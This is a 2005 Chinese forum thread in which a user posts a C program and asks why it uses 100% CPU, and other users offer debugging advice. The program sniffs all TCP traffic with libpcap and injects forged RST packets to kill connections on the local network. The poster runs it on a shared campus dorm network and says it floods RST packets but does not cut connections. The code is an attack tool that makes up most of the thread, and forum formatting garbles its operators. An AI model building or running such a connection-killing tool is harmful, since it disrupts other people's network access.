免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
12下一页
最近访问板块 发新帖
查看: 2546 | 回复: 16
打印 上一主题 下一主题

为什么这个一运行就占100%CPU? [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2005-05-04 22:52 |只看该作者 |倒序浏览
我用pcap 抓TCP包,然后试图切断已建立或正在建立的连接,但程序一运行
就会占用将近100%的CPU。我原来用PACKET socket 写过一个类似的,没有这种情况呀,请帮我看一下?

  1. #include<unistd.h>;
  2. #include<sys/types.h>;
  3. #include<sys/socket.h>;
  4. #include<linux/in.h>;
  5. #include<linux/if.h>;
  6. #include<asm/types.h>;
  7. #include<linux/if_packet.h>;
  8. #include<linux/if_ether.h>;
  9. #include<linux/ip.h>;
  10. #include<linux/tcp.h>;
  11. #include<linux/sockios.h>;
  12. #include<pcap.h>;

  13. struct psuedohdr  {
  14.    __u32 source_address;
  15.    __u32 dest_address;
  16.    unsigned char place_holder;
  17.    unsigned char protocol;
  18.    unsigned short length;
  19. } psuedohdr;

  20. void open_raw_sock(void);
  21. void analyze(u_char *,const struct pcap_pkthdr *,const u_char *);
  22. void analyze(u_char *,const struct pcap_pkthdr *,const u_char *);
  23. void killtcp(struct ethhdr *,struct iphdr *,struct tcphdr *);
  24. void build_eth(struct ethhdr **,struct ethhdr*);
  25. void build_ip(struct iphdr **,struct iphdr *);
  26. void build_tcp(struct tcphdr **,struct tcphdr *);
  27. void __kill_tcp(char *);
  28. int get_ifindex(int);
  29. int in_cksum(u_short *,int);
  30. unsigned short trans_check(unsigned char , char *, int , __u32 , __u32 );
  31. void err_quit(char *);
  32. void usage(void);

  33. int eflag=0;
  34. int xflag=0;
  35. int sockk;
  36. struct sockaddr_ll sll;

  37. main(int argc,char **argv)
  38. {
  39.         pcap_t *handle;
  40.         extern int opterr;
  41.         extern char *optarg;
  42.         char c;
  43.         char *dev;
  44.         struct bpf_program filter;
  45.         char *filterp="tcp";
  46.         char errbuf[PCAP_ERRBUF_SIZE];
  47.         __u32 net,mask;
  48.         opterr=0;
  49.         while((c=getopt(argc,argv,"ex:"))!=EOF)
  50.         {
  51.                 switch(c)
  52.                 {
  53.                         case 'e':eflag=1;break;
  54.                         case 'x':xflag=1;filterp=optarg;break;
  55.                         default:
  56.                                  usage();
  57.                                  exit(0);
  58.                 }
  59.         }
  60.         open_raw_sock();
  61.         if(!(dev=pcap_lookupdev(errbuf)))
  62.                 err_quit("pcap_lookupdev");
  63.         if(pcap_lookupnet(dev,&net,&mask,errbuf)<0)
  64.                 err_quit("pcap_lookupnet");
  65.         if(!(handle=pcap_open_live(dev,2048,1,-1,errbuf)))
  66.                 err_quit("pcap_open_live");
  67.         if(1)
  68.         {
  69.                 if(pcap_compile(handle,&filter,filterp,0,mask)<0)
  70.                         err_quit("pcap_compile");
  71.                 if(pcap_setfilter(handle,&filter)<0)
  72.                         err_quit("pcap_setfilter");
  73.         }
  74.         pcap_loop(handle,-1,analyze,NULL);
  75. }
  76. void analyze(u_char *usr,const struct pcap_pkthdr *pkthdr,const u_char *packet)
  77. {
  78.         struct ethhdr *eth;
  79.         struct iphdr *ip;
  80.         struct tcphdr *tcp;

  81.         eth=(struct ethhdr *)packet;
  82.         ip=(struct iphdr *)(eth+1);
  83.         tcp=(struct tcphdr *)((u_char *)ip+(ip->;ihl<<2));
  84.         killtcp(eth,ip,tcp);
  85. }
  86. void killtcp(struct ethhdr *eth,struct iphdr *ip,struct tcphdr *tcp)
  87. {
  88.         char bufk[2048];
  89.         struct ethhdr *ethk;
  90.         struct iphdr *ipk;
  91.         struct tcphdr *tcpk;

  92.         memset(bufk,0,2048);
  93.         ethk=(struct ethhdr *)bufk;
  94.         ipk=(struct iphdr *)(ethk+1);
  95.         tcpk=(struct tcphdr *)(ipk+1);
  96.         build_eth(&ethk,eth);
  97.         build_ip(&ipk,ip);
  98.         build_tcp(&tcpk,tcp);
  99.         __kill_tcp(bufk);
  100. }
  101. void build_eth(struct ethhdr **ethk,struct ethhdr *eth)
  102. {
  103.         struct ethhdr *p=*ethk;

  104.         memcpy(p->;h_dest,eth->;h_source,6);
  105.         memcpy(p->;h_source,eth->;h_dest,6);
  106.         memcpy(&p->;h_proto,&eth->;h_proto,2);
  107. }
  108. void build_ip(struct iphdr **ipk,struct iphdr *ip)
  109. {
  110.         struct iphdr *p=*ipk;

  111.         p->;ihl=5;
  112.         p->;version=4;
  113.         p->;tos=0;////////////////////////
  114.         p->;tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
  115.         p->;id=htons(1234);
  116.         p->;frag_off=0;
  117.         p->;ttl=64;
  118.         p->;protocol=IPPROTO_TCP;
  119.         memcpy((u_char *)&p->;saddr,(u_char *)&ip->;daddr,sizeof(__u32));
  120.         memcpy((u_char *)&p->;daddr,(u_char *)&ip->;saddr,sizeof(__u32));
  121.         p->;check=(u_short)(in_cksum((u_short *)p,sizeof(struct iphdr)));////////////////////////////
  122. }
  123. void build_tcp(struct tcphdr **tcpk,struct tcphdr *tcp)
  124. {
  125.         struct tcphdr *p=*tcpk;

  126.         memcpy(&p->;source,&tcp->;dest,sizeof(__u16));
  127.         memcpy(&p->;dest,&tcp->;source,sizeof(__u16));
  128.         if(tcp->;syn==1)
  129.         {
  130.                 __u32 ack_seq=htonl(ntohl(tcp->;seq)+1);
  131.                 memcpy(&p->;ack_seq,&ack_seq,sizeof(__u32));
  132.         }
  133.         else
  134.                 p->;seq=htonl(1111111);
  135.         p->;rst=1;
  136.         p->;doff=5;
  137.         p->;window=htons(1024);
  138.         p->;check=(trans_check(IPPROTO_TCP,(unsigned char * )p,sizeof(struct tcphdr ),tcp->;source,tcp->;dest));///////////////////////
  139. }
  140. void open_raw_sock(void)
  141. {
  142.         u_char *mac="\x00\x03\x0d\x09\x91\x7f";
  143.        
  144.         if((sockk=socket(PF_PACKET,SOCK_RAW,htons(ETH_P_IP)))<0)
  145.                 err_quit("socket");
  146.         memset(&sll,0,sizeof(sll));
  147. //        sll.sll_protocol=htons(ETH_P_IP);
  148. //        sll.sll_ifindex=get_ifindex(sockk);
  149.         sll.sll_family=AF_PACKET;
  150.         memcpy(sll.sll_addr,mac,6);
  151.         sll.sll_halen=6;
  152.         sll.sll_ifindex=get_ifindex(sockk);
  153. }
  154. void __kill_tcp(char *frame)
  155. {
  156.         int n;
  157.         int len;
  158.        
  159.         len=sizeof(struct ethhdr)+sizeof(struct iphdr)+sizeof(struct tcphdr);
  160.         n=sendto(sockk,frame,len,0,(struct sockaddr *)&sll,sizeof(sll));
  161.         if(n!=len)
  162.                 err_quit("sendto");
  163. }
  164. int get_ifindex(int s)
  165. {
  166.         struct ifreq ifr;
  167.        
  168.         memset(&ifr,0,sizeof(ifr));
  169.         strncpy(ifr.ifr_name,"eth0",sizeof(ifr.ifr_name)-1);
  170.         ifr.ifr_name[sizeof(ifr.ifr_name)-1]='\0';
  171.         if(ioctl(s,SIOCGIFINDEX,&ifr)<0)
  172.                 err_quit("ioctl");
  173.         return ifr.ifr_ifindex;
  174. }
  175. #undef        ADDCARRY
  176. #define ADDCARRY(sum) { \
  177.         if (sum & 0xffff0000) {        \
  178.                 sum &= 0xffff; \
  179.                 sum++; \
  180.         } \
  181. }

  182. int in_cksum(u_short *addr, int len)
  183. {
  184.         union word {
  185.                 char        c[2];
  186.                 u_short        s;
  187.         } u;
  188.         int sum = 0;

  189.         while (len >; 0) {
  190.                 /*
  191.                  * add by words.
  192.                  */
  193.                 while ((len -= 2) >;= 0) {
  194.                         if ((unsigned long)addr & 0x1) {
  195.                                 /* word is not aligned */
  196.                                 u.c[0] = *(char *)addr;
  197.                                 u.c[1] = *((char *)addr+1);
  198.                                 sum += u.s;
  199.                                 addr++;
  200.                         } else
  201.                                 sum += *addr++;
  202.                         ADDCARRY(sum);
  203.                 }
  204.                 if (len == -1)
  205.                         /*
  206.                          * Odd number of bytes.
  207.                          */
  208.                         u.c[0] = *(u_char *)addr;
  209.         }
  210.         if (len == -1) {
  211.                 /* The last mbuf has odd # of bytes. Follow the
  212.                    standard (the odd byte is shifted left by 8 bits) */
  213.                 u.c[1] = 0;
  214.                 sum += u.s;
  215.                 ADDCARRY(sum);
  216.         }
  217.         return (~sum & 0xffff);
  218. }
  219. unsigned short trans_check(unsigned char proto,
  220.              char *packet,
  221.              int length,
  222.              __u32 source_address,
  223.              __u32 dest_address)
  224. {
  225.    char *psuedo_packet;
  226.    unsigned short answer;
  227.    
  228.    psuedohdr.protocol = proto;
  229.    psuedohdr.length = htons(length);
  230.    psuedohdr.place_holder = 0;

  231.    psuedohdr.source_address = source_address;
  232.    psuedohdr.dest_address = dest_address;
  233.    
  234.    if((psuedo_packet =(char *)malloc(sizeof(psuedohdr) + length)) == NULL)  {
  235.      perror("malloc");
  236.      exit(1);
  237.    }
  238.    
  239.    memcpy(psuedo_packet,&psuedohdr,sizeof(psuedohdr));
  240.    memcpy((psuedo_packet + sizeof(psuedohdr)),
  241.      packet,length);
  242.    
  243.    answer = (unsigned short)in_cksum((unsigned short *)psuedo_packet,
  244.                  (length + sizeof(psuedohdr)));
  245.    free(psuedo_packet);
  246.    return answer;
  247. }
  248. void err_quit(char *p)
  249. {
  250.         perror(p);
  251.         exit(1);
  252. }
  253. void usage(void)
  254. {
  255. }
复制代码

论坛徽章:
0
2 [报告]
发表于 2005-05-06 11:28 |只看该作者

为什么这个一运行就占100%CPU?

请帮忙看一下呀,自己顶一下

论坛徽章:
0
3 [报告]
发表于 2005-05-06 12:13 |只看该作者

为什么这个一运行就占100%CPU?

呵呵,谁有空去看这一大串东西

论坛徽章:
0
4 [报告]
发表于 2005-05-06 12:17 |只看该作者

为什么这个一运行就占100%CPU?

其实并不长,因为后边的checksum计算应该不是问题,乘下的就不多了
是不是pcap有什么我用的不对?

论坛徽章:
0
5 [报告]
发表于 2005-05-06 13:42 |只看该作者

为什么这个一运行就占100%CPU?

我粗略过了一遍,没看出什么问题。

cpu消耗是不是应该跟流量很有关系,在我这里cup消耗还不到 10%(你贴的程序,把killtcp 去掉后).

论坛徽章:
0
6 [报告]
发表于 2005-05-06 13:54 |只看该作者

为什么这个一运行就占100%CPU?

我是在教育网(北京化工大学)里,那个程序有时运行要稍微等一下(一分钟)才能体现出占用100%,刚开始是正常的

论坛徽章:
0
7 [报告]
发表于 2005-05-06 13:56 |只看该作者

为什么这个一运行就占100%CPU?

而且原来用PACKET socket写的就没有这种现象

论坛徽章:
0
8 [报告]
发表于 2005-05-06 13:58 |只看该作者

为什么这个一运行就占100%CPU?

能观察到切断效果吗?

论坛徽章:
0
9 [报告]
发表于 2005-05-06 14:01 |只看该作者

为什么这个一运行就占100%CPU?

[quote]原帖由 "rootclown"]而且原来用PACKET socket写的就没有这种现象[/quote 发表:


可以追踪一下libpcap使用了哪几个函数,然后把这几个函数的实现与你用 PACKET socket 的实现对比一下,看问题出在什么地方。

论坛徽章:
0
10 [报告]
发表于 2005-05-06 14:03 |只看该作者

为什么这个一运行就占100%CPU?

它发出了好多RST包(我觉得应该是不正常的) ,但是好像没有切断,当时我们宿舍只有两个人上网,用交换机。
原来用PACKET socket写的还能切断呢
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP